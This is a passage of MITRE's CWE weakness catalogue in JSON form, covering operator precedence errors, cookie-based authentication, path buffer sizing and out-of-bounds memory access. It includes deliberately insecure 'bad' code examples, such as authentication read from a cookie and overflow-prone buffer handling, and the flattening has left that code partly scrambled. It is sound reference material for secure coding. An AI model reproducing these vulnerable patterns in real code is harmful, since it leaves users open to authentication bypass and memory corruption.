Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Observed_Examples"}]}},"783":{"attr":{"@_ID":"783","@_Name":"Operator Precedence Logic Error","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program uses an expression in which operator precedence causes incorrect logic to be used.","Extended_Description":"While often just a bug, operator precedence logic errors can have serious consequences if they are used in security-critical code, such as making an authentication decision.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"670","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Rarely"}},{"attr":{"@_Name":"C++","@_Prevalence":"Rarely"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Rarely"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"Logic errors related to operator precedence may cause problems even during normal operation, so they are probably discovered quickly during the testing phase. If testing is incomplete or there is a strong reliance on manual review of the code, then these errors may not be discovered before the software is deployed."}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Varies by Context","Unexpected State"],"Note":"The consequences will vary based on the context surrounding the incorrect precedence. In a security decision, integrity or confidentiality are the most likely results. Otherwise, a crash may occur due to the software reaching an unexpected state."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Regularly wrap sub-expressions in parentheses, especially in security-critical code."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following example, the method validateUser makes a call to another method to authenticate a username and password for a user and returns a success or failure code.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define FAIL 0#define SUCCESS 1...int validateUser(char *username, char *password) {}","xhtml:br":["","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int isUser = FAIL;if (isUser = AuthenticateUser(username, password) == FAIL) {}else {}return isUser;","xhtml:br":["","","","","","","","",""],"xhtml:i":["// call method to authenticate username and password","// if authentication fails then return failure otherwise return success"],"xhtml:div":[{"#text":"return isUser;","attr":{"@_style":"margin-left:10px;"}},{"#text":"isUser = SUCCESS;","attr":{"@_style":"margin-left:10px;"}}]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...if ((isUser = AuthenticateUser(username, password)) == FAIL) {...","xhtml:br":["","","",""]}}],"Body_Text":"However, the method that authenticates the username and password is called within an if statement with incorrect operator precedence logic. Because the comparison operator \\"==\\" has a higher precedence than the assignment operator \\"=\\", the comparison operator will be evaluated first and if the method returns FAIL then the comparison will be true, the return variable will be set to true and SUCCESS will be returned. This operator precedence logic error can be easily resolved by properly using parentheses within the expression of the if statement, as shown below."},{"Intro_Text":"In this example, the method calculates the return on investment for an accounting/financial application. The return on investment is calculated by subtracting the initial investment costs from the current value and then dividing by the initial investment costs.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public double calculateReturnOnInvestment(double currentValue, double initialInvestment) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"double returnROI = 0.0;returnROI = currentValue - initialInvestment / initialInvestment;return returnROI;","xhtml:br":["","","","","",""],"xhtml:i":"// calculate return on investment"}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"...returnROI = (currentValue - initialInvestment) / initialInvestment;...","xhtml:br":["","","",""]}}],"Body_Text":["However, the return on investment calculation will not produce correct results because of the incorrect operator precedence logic in the equation. The divide operator has a higher precedence than the minus operator, therefore the equation will divide the initial investment costs by the initial investment costs which will only subtract one from the current value. Again this operator precedence logic error can be resolved by the correct use of parentheses within the equation, as shown below.","Note that the initialInvestment variable in this example should be validated to ensure that it is greater than zero to avoid a potential divide by zero error (CWE-369)."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-2516","Description":"Authentication module allows authentication bypass because it uses \\"(x = call(args) == SUCCESS)\\" instead of \\"((x = call(args)) == SUCCESS)\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2516"},{"Reference":"CVE-2008-0599","Description":"Chain: Language interpreter calculates wrong buffer size (CWE-131) by using \\"size = ptr ? X : Y\\" instead of \\"size = (ptr ? X : Y)\\" expression.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0599"},{"Reference":"CVE-2001-1155","Description":"Chain: product does not properly check the result of a reverse DNS lookup because of operator precedence (CWE-783), allowing bypass of DNS-based access restrictions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1155"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP00-C","Entry_Name":"Use parentheses for precedence of operation","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP04-PL","Entry_Name":"Do not mix the early-precedence logical operators with late-precedence logical operators","Mapping_Fit":"CWE More Abstract"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-704"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Precedence&#34;, Page 287"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-07-16"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}]}},"784":{"attr":{"@_ID":"784","@_Name":"Reliance on Cookies without Validation and Integrity Checking in a Security Decision","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application uses a protection mechanism that relies on the existence or values of a cookie, but it does not properly ensure that the cookie is valid for the associated user.","Extended_Description":"Attackers can easily modify cookies, within the browser or by implementing the client-side code outside of the browser. Attackers can bypass protection mechanisms such as authorization and authentication by modifying the cookie to contain an expected value.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"807","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"565","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"It is dangerous to use cookies to set a user\'s privileges. The cookie can be manipulated to claim a high level of authorization, or to claim that successful authentication has occurred."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Avoid using cookie data for a security-related decision."},{"Phase":"Implementation","Description":"Perform thorough input validation (i.e.: server side validation) on the cookie data if you\'re going to use it for a security related decision."},{"Phase":"Architecture and Design","Description":"Add integrity checks to detect tampering."},{"Phase":"Architecture and Design","Description":"Protect critical cookies from replay attacks, since cross-site scripting or other attacks may allow attackers to steal a strongly-encrypted cookie that also passes integrity checks. This mitigation applies to cookies that should only be valid during a single transaction or session. By enforcing timeouts, you may limit the scope of an attack. As part of your integrity check, use an unpredictable, server-side value that is not exposed to the client."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-15"},"Intro_Text":"The following code excerpt reads a value from a browser cookie to determine the role of the user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Cookie[] cookies = request.getCookies();for (int i =0; i&lt; cookies.length; i++) {}","xhtml:br":"","xhtml:div":{"#text":"Cookie c = cookies[i];if (c.getName().equals(\\"role\\")) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"userRole = c.getValue();","attr":{"@_style":"margin-left:10px;"}}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-16"},"Intro_Text":"The following code could be for a medical records application. It performs authentication by checking if a cookie has been set.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$auth = $_COOKIES[\'authenticated\'];if (! $auth) {}DisplayMedicalHistory($_POST[\'patient_ID\']);","xhtml:br":["",""],"xhtml:div":{"#text":"if (AuthenticateUser($_POST[\'user\'], $_POST[\'password\']) == \\"success\\") {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"// save the cookie to send out in future responsessetcookie(\\"authenticated\\", \\"1\\", time()+60*60*2);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"ShowLoginScreen();die(\\"\\\\n\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":""}}},"Body_Text":["The programmer expects that the AuthenticateUser() check will always be applied, and the \\"authenticated\\" cookie will only be set when authentication succeeds. The programmer even diligently specifies a 2-hour expiration for the cookie.","However, the attacker can set the \\"authenticated\\" cookie to a non-zero value such as 1. As a result, the $auth variable is 1, and the AuthenticateUser() check is not even performed. The attacker has bypassed the authentication."]},{"attr":{"@_Demonstrative_Example_ID":"DX-17"},"Intro_Text":"In the following example, an authentication flag is read from a browser cookie, thus allowing for external control of user state data.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Cookie[] cookies = request.getCookies();for (int i =0; i&lt; cookies.length; i++) {}","xhtml:br":"","xhtml:div":{"#text":"Cookie c = cookies[i];if (c.getName().equals(\\"authenticated\\") &amp;&amp; Boolean.TRUE.equals(c.getValue())) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"authenticated = true;","attr":{"@_style":"margin-left:10px;"}}}}}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-1549","Description":"Attacker can bypass authentication by setting a cookie to a specific value.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1549"},{"Reference":"CVE-2009-1619","Description":"Attacker can bypass authentication and gain admin privileges by setting an \\"admin\\" cookie to 1.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1619"},{"Reference":"CVE-2009-0864","Description":"Content management system allows admin privileges by setting a \\"login\\" cookie to \\"OK.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0864"},{"Reference":"CVE-2008-5784","Description":"e-dating application allows admin privileges by setting the admin cookie to 1.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5784"},{"Reference":"CVE-2008-6291","Description":"Web-based email list manager allows attackers to gain admin privileges by setting a login cookie to \\"admin.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6291"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-706"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 13, &#34;Sensitive Data in Cookies and Fields&#34; Page 435"}}]},"Notes":{"Note":{"#text":"A new parent might need to be defined for this entry. This entry is specific to cookies, which reflects the significant number of vulnerabilities being reported for cookie-based authentication in CVE during 2008 and 2009. However, other types of inputs - such as parameters or headers - could also be used for similar authentication or authorization. Similar issues (under the Research view) include CWE-247 and CWE-472.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-07-16"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}]}},"785":{"attr":{"@_ID":"785","@_Name":"Use of Path Manipulation Function without Maximum-sized Buffer","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software invokes a function for normalizing paths or file names, but it provides an output buffer that is smaller than the maximum possible size, such as PATH_MAX.","Extended_Description":"Passing an inadequately-sized output buffer to a path manipulation function can result in a buffer overflow. Such functions include realpath(), readlink(), PathAppend(), and others.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"676","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"120","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Background_Details":{"Background_Detail":"Windows provides a large number of utility functions that manipulate buffers containing filenames. In most cases, the result is returned in a buffer that is passed in as input. (Usually the filename is modified in place.) Most functions require the buffer to be at least MAX_PATH bytes in length, but you should check the documentation for each function individually. If the buffer is not large enough to store the result of the manipulation, a buffer overflow can occur."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Modify Memory","Execute Unauthorized Code or Commands","DoS: Crash, Exit, or Restart"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Always specify output buffers large enough to handle the maximum-size possible result from path manipulation functions."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In this example the function creates a directory named \\"output\\\\&lt;name&gt;\\" in the current directory and returns a heap-allocated copy of its name.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char *createOutputDirectory(char *name) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char outputDirectoryName[128];if (getCurrentDirectory(128, outputDirectoryName) == 0) {}if (!PathAppend(outputDirectoryName, \\"output\\")) {}if (!PathAppend(outputDirectoryName, name)) {}if (SHCreateDirectoryEx(NULL, outputDirectoryName, NULL) != ERROR_SUCCESS) {}return StrDup(outputDirectoryName);","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"return null;","attr":{"@_style":"margin-left:10px;"}},{"#text":"return null;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"return null;","xhtml:br":""}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"return null;","xhtml:br":""}}]}}}},"Body_Text":"For most values of the current directory and the name parameter, this function will work properly. However, if the name parameter is particularly long, then the second call to PathAppend() could overflow the outputDirectoryName buffer, which is smaller than MAX_PATH bytes."}},"Affected_Resources":{"Affected_Resource":["Memory","File or Directory"]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Often Misused: File System"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP9","Entry_Name":"Faulty String Expansion"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Notes":{"Note":{"#text":"This entry is at a much lower level of abstraction than most entries because it is function-specific. It also has significant overlap with other entries that can vary depending on the perspective. For example, incorrect usage could trigger either a stack-based overflow (CWE-121) or a heap-based overflow (CWE-122). The CWE team has not decided how to handle such entries.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2009-07-27","Submission_Comment":"Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified before initial publication."},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Demonstrative_Examples, Relationships, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}]}},"786":{"attr":{"@_ID":"786","@_Name":"Access of Memory Location Before Start of Buffer","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software reads or writes to a buffer using an index or pointer that references a memory location prior to the beginning of the buffer.","Extended_Description":"This typically occurs when a pointer or its index is decremented to a position before the buffer, when pointer arithmetic results in a position before the beginning of the valid memory location, or when a negative index is used.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory","Note":"For an out-of-bounds read, the attacker may have access to sensitive information. If the sensitive information contains system details, such as the current buffers position in memory, this knowledge can be used to craft further attacks, possibly with more severe consequences."},{"Scope":["Integrity","Availability"],"Impact":["Modify Memory","DoS: Crash, Exit, or Restart"],"Note":"Out of bounds memory access will very likely result in the corruption of relevant memory, and perhaps instructions, possibly leading to a crash."},{"Scope":"Integrity","Impact":["Modify Memory","Execute Unauthorized Code or Commands"],"Note":"If the corrupted memory can be effectively controlled, it may be possible to execute arbitrary code. If the corrupted memory is data rather than instructions, the system will continue to function with improper changes, possibly in violation of an implicit or explicit policy."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-87"},"Intro_Text":"In the following C/C++ example, a utility function is used to trim trailing whitespace from a character string. The function copies the input string to a local character string and uses a while statement to remove the trailing whitespace by moving backward through the string and overwriting whitespace with a NUL character.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* trimTrailingWhitespace(char *strMessage, int length) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char *retMessage;char *message = malloc(sizeof(char)*(length+1));char message[length+1];int index;for (index = 0; index &lt; length; index++) {}message[index] = \'\\\\0\';int len = index-1;while (isspace(message[len])) {}retMessage = message;return retMessage;","xhtml:br":["","","","","","","","","","","","","","",""],"xhtml:i":["// copy input string to a temporary string","// trim trailing whitespace","// return string without trailing whitespace"],"xhtml:div":[{"#text":"message[index] = strMessage[index];","attr":{"@_style":"margin-left:10px;"}},{"#text":"message[len] = \'\\\\0\';len--;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},"Body_Text":"However, this function can cause a buffer underwrite if the input character string contains all whitespace. On some systems the while statement will move backwards past the beginning of a character string and will call the isspace() function on an address outside of the bounds of the local buffer."},{"attr":{"@_Demonstrative_Example_ID":"DX-90"},"Intro_Text":"The following example asks a user for an offset into an array to select an item.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int main (int argc, char **argv) {}","xhtml:br":"","xhtml:div":{"#text":"char *items[] = {\\"boat\\", \\"car\\", \\"truck\\", \\"train\\"};int index = GetUntrustedOffset();printf(\\"You selected %s\\\\n\\", items[index-1]);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"The programmer allows the user to specify which element in the list to select, however an attacker can provide an out-of-bounds offset, resulting in a buffer over-read (CWE-126)."},{"attr":{"@_Demonstrative_Example_ID":"DX-88"},"Intro_Text":"The following is an example of code that may result in a buffer underwrite, if find() returns a negative value to indicate that ch is not found in srcBuf:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int main() {}","xhtml:div":{"#text":"...strncpy(destBuf, &amp;srcBuf[find(srcBuf, ch)], 1024);...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"If the index to srcBuf is somehow under user control, this is an arbitrary write-what-where condition."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-2227","Description":"Unchecked length of SSLv2 challenge value leads to buffer underflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2227"},{"Reference":"CVE-2007-4580","Description":"Buffer underflow from a small size value with a large buffer (length parameter inconsistency, CWE-130)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4580"},{"Reference":"CVE-2007-1584","Description":"Buffer underflow from an all-whitespace string, which causes a counter to be decremented before the buffer while looking for a non-whitespace character.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1584"},{"Reference":"CVE-2007-0886","Description":"Buffer underflow resultant from encoded data that triggers an integer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0886"},{"Reference":"CVE-2006-6171","Description":"Product sets an incorrect buffer size limit, leading to \\"off-by-two\\" buffer underflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6171"},{"Reference":"CVE-2006-4024","Description":"Negative value is used in a memcpy() operation, leading to buffer underflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4024"},{"Reference":"CVE-2004-2620","Description":"Buffer underflow due to mishandled special characters","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2620"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR30-C","Entry_Name":"Do not form or use out-of-bounds pointers or array subscripts","Mapping_Fit":"CWE More Specific"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-10-21"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"787":{"attr":{"@_ID":"787","@_Name":"Out-of-bounds Write","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software writes data past the end, or before the beginning, of the intended buffer.","Extended_Description":"Typically, this can result in corruption of data, a crash, or code execution.  The software may modify an index or perform pointer arithmetic that references a memory location that is outside of the boundaries of the buffer.  A subsequent write operation then produces undefined or unexpected results.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"C++","@_Prevalence":"Often"}},{"attr":{"@_Class":"Assembly","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Memory Corruption","Description":"The generic term \\"memory corruption\\" is often used to describe the consequences of writing to memory outside the bounds of a buffer, or to memory that is invalid, when the root cause is something other than a sequential copy of excessive data from a fixed starting location. This may include issues such as incorrect pointer arithmetic, accessing invalid pointers due to incomplete initialization or memory release, etc."}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability"],"Impact":["Modify Memory","DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands"]}},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-1"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.","Automated static analysis generally does not account for environmental considerations when reporting out-of-bounds memory operations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report buffer overflows that originate from command line arguments in a program that is not expected to run with setuid or other special privileges."]},"Effectiveness":"High","Effectiveness_Notes":"Detection techniques for buffer-related errors are more mature than for most other weakness types."},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":"This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-3"},"Phase":"Requirements","Strategy":"Language Selection","Description":{"xhtml:p":["Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, many languages that perform their own memory management, such as Java and Perl, are not subject to buffer overflows. Other languages, such as Ada and C#, typically provide overflow protection, but the protection can be disabled by the programmer.","Be wary that a language\'s interface to native code may still be subject to overflows, even if the language itself is theoretically safe."]}},{"attr":{"@_Mitigation_ID":"MIT-4.1"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","Examples include the Safe C String Library (SafeStr) by Messier and Viega [REF-57], and the Strsafe.h library from Microsoft [REF-56]. These libraries provide safer versions of overflow-prone string-handling functions."]},"Effectiveness_Notes":"This is not a complete solution, since many buffer overflows are not related to strings."},{"attr":{"@_Mitigation_ID":"MIT-10"},"Phase":"Build and Compilation","Strategy":"Compilation or Build Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that automatically provide 